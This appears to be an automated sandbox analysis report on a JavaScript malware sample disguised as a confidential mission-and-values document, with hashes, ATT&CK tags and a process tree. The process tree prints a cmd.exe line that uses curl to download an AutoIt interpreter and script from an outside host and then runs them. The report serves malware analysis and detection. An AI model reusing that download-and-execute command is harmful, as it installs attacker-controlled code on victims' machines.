d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
121s
max time network
127s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
18-10-2023 07:18

Target

Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
Size

49KB
MD5

c19568c51692a5b4dbfc29c02fafcf8d
SHA1

b265c4f15c591a241d19c7284efeeb1e73407df0
SHA256

c8c425368b40c30a09a8e4990e53a1df4c29493ad138287493da0d6f56f1dade
SHA512

329efccd2808ffd1ee7c6e741890aad2ee22705bd0c2703a11f054e6d29520964c39edfb039cf3834c0e23990994b95748edb74944fdfad1d8c78e5adc9b4dbc
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Dxt7niEL:nAIMFFdYMxAcEQDFXL

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2940	2084	wscript.exe	28
PID 2084 wrote to memory of 2940	2084	wscript.exe	28
PID 2084 wrote to memory of 2940	2084	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb & Autoit3.exe sejtnt.au3
  2⤵
  PID:2940

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact